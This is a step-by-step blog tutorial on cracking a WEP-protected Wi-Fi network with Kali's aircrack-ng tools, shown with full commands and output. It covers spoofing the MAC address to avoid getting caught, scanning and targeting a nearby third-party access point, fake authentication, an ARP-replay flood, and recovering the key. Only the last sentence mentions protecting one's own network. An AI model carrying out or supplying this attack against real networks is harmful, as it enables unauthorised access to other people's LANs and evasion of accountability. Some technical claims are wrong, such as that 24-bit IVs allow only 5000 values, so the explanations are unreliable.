First you'll want to boot up Backtrack or Kali; you could theoretically use any linux-distro and install the tools separately, but who has time for that. I personally keep Kali on an SD card and boot into live-mode on my laptop when I need it.
Hiding Your Tracks
Because network cracking can you get in trouble, we'll want to hide our MAC address before we begin. BT (I'm going to refer to both Backtrack and Kali as BT from now on) has a nifty tool install for this called simply macchanger.airmon-ng stopThis will stop airmon-ng from monitoring, shutdown your wlan0 interface, change it's MAC address to 00:11:22:33:44:55 (how original), then start up the monitoring again. Turning on airmon-ng gives us a virtual interface, mon0, which we will be using from here on out.
ifconfig wlan0 down
macchanger —mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Reconnaissance
We'll first want to scan area within range for available wireless networks. You should see at least a few pop up as there is an overabundance of wireless networks..everywhere. To start the scan, open up a new terminal and execute airodump-ng. Press Ctrl-C to kill it after you determine it's not going to find anymore WLANs.
airodump-ng
CH 7 ][ Elapsed: 48 s ][ 2013-06-01 20:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:6B:4D:13:0A -49 119 17 0 6 54 WEP WEP dotscafe
B0:E7:54:A7:B7:A9 -82 56 0 0 11 54 . WEP WEP BELL237
34:EF:44:F8:6D:A9 -88 11 0 0 9 54 . WPA TKIP PSK abby
78:CD:8E:66:3E:51 -89 1 1 0 10 54e WPA TKIP PSK dave
BSSID STATION PWR Rate Lost Frames Probe
00:22:6B:4D:13:0A 60:A1:0A:1E:0B:5D -63 0 -54 0 10
00:22:6B:4D:13:0A 98:0C:82:8A:52:38 -83 1 -24 0 4
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 0 - 1 0 1
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 0 - 1 0 1
Data Collection
As you can see there's a plethora of information about each AP. The things we're most concerned with is the BSSID and the Channel (CH) it's operating on. We can run airodump-ng again, this time giving it some specifics. The bell237 in the command is the file name were the traffic capture is going to be dumped; for consistency's sake, I generally keep the file name the same as the ESSID.airodump-ng -c 11 -w bell237 --bssid B0:E7:54:A7:B7:A9 mon0
CH 11 ][ Elapsed: 2 mins ][ 2013-06-01 21:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B0:E7:54:A7:B7:A9 -78 96 1254 50485 0 11 54 . WEP WEP BELL237
BSSID STATION PWR Rate Lost Frames Probe
B0:E7:54:A7:B7:A9 00:11:22:33:44:55 0 0 - 1 52425 107860
B0:E7:54:A7:B7:A9 28:6A:BA:17:AD:65 -87 0 - 1 0 1
B0:E7:54:A7:B7:A9 38:AA:3C:75:83:E3 -83 11 - 1 0 254
B0:E7:54:A7:B7:A9 28:6A:BA:17:AD:65 -87 0 - 1 0 1
Now at this point, you could just let airodump-ng run and gather the air packets on it's own. But we both know by looking at how fast that Data number is climbing it'll be a long wait. To speed things along we're going to associate ourselves with the AP and start a flood. You'll wait to leave airodump-ng running while you do this, so open up a new terminal. The -1 option sets the attack mode to a fake authentication and the 0 is auto number of packets per burst (the default is 1).
aireplay-ng -1 0 -a B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 -e BELL237 mon0
The interface MAC (XX:XX:XX:XX:XX:XX) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:54:05 Waiting for beacon frame (BSSID: B0:E7:54:A7:B7:A9) on channel 11
20:54:05 Sending Authentication Request (Open System) [ACK]
20:54:05 Authentication successful
20:54:05 Sending Association Request [ACK]
20:54:05 Association successful :-) (AID: 1)
Now that we're authenticated we can begin to flood. We'll be flooding ARP-requests, which is what the -3 option in our command denotes.
aireplay-ng -3 -b B0:E7:54:A7:B7:A9 -h 00:11:22:33:44:55 mon0You'll soon see that terminal overflow with ARP-requests; just let it go. If we go back to our other terminal where we left airodump running you'll see the #Data column sky-rocket, the number represents the number of IVs (or Initialization Vectors) that we have collected so far, each WEP data packet has a 3-byte IV. We'll want to collect a heap of them to use because the WEP IV is only 24-bit, meaning it'll only have 5000 possibilities. And the flood has begin. Let it go till it hits about 50,000. When it gets there, you can go ahead and kill both applications (but leave don't close the windows).
Attack
In one of the two terminals (or a new one if you prefer) we'll need to load our capture file from airodump into aircrack-ng to actually crack the IVs we collected earlier. The IVs are encrypted and aircrack will attempt to run them against a set of statistical attacks. In the event that aircrack fails (and believe me it can), just go back to the two terminals we were using for airodump and aireplay and run them again, this time until twice as many IVs have been captures (now you know why I told you not to close the windows!).aircrack-ng -b B0:E7:54:A7:B7:A9 bell237-01.cap
Opening bell237-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50484 ivs.
Aircrack-ng 1.1
[00:00:02] Tested 1388233 keys (got 50338 IVs)
KB depth byte(vote)
0 0/ 1 28(63232) 8A(59136) 2F(58880) 93(58880) F0(58624) 88(58368)
1 0/ 1 55(70656) 12(59648) 21(58880) F8(58880) 9A(58368) CF(58368)
2 0/ 2 07(62464) E4(61696) 9E(60672) 7C(58624) 33(57088) 6E(57088)
3 0/ 1 74(71168) 53(60416) D9(59392) E9(58112) ED(57856) 0E(57344)
4 0/ 1 30(74752) 43(58368) 68(58368) 5C(57600) A2(57600) 52(57088)
5 0/ 1 19(63488) 4D(61184) AC(60928) 05(58624) 5A(58624) 89(58624)
6 0/ 1 75(74752) 29(60160) 4D(59904) 86(59904) 30(59392) 57(58880)
7 2/ 4 B4(60928) 4E(60416) 54(60416) 3E(60160) 47(58368) B8(58112)
8 1/ 3 46(60672) 9F(59904) 05(58880) 27(58624) 2B(58368) BD(58112)
9 0/ 1 48(66048) 86(60160) A2(60160) 32(57856) AE(57600) EE(57600)
10 0/ 1 54(62464) DF(58624) FD(57856) 7A(57600) 46(57344) 0C(56832)
11 0/ 1 64(71936) 48(59392) 11(59136) 66(59136) 86(57600) 88(57600)
12 26/ 12 ED(55040) 83(54784) 90(54784) C4(54784) 05(54528) 14(54528)
KEY FOUND! [ 28:55:07:74:30:19:75:98:46:48:54:64:38 ]
Decrypted correctly: 100%
And that's it! Pop the key (without the colons) into the authentication prompt for the wireless network and you're set. This just shows you how easy it is to get into someone else's LAN, make sure you keep your private network protected with at least WPA and if possible WPA2.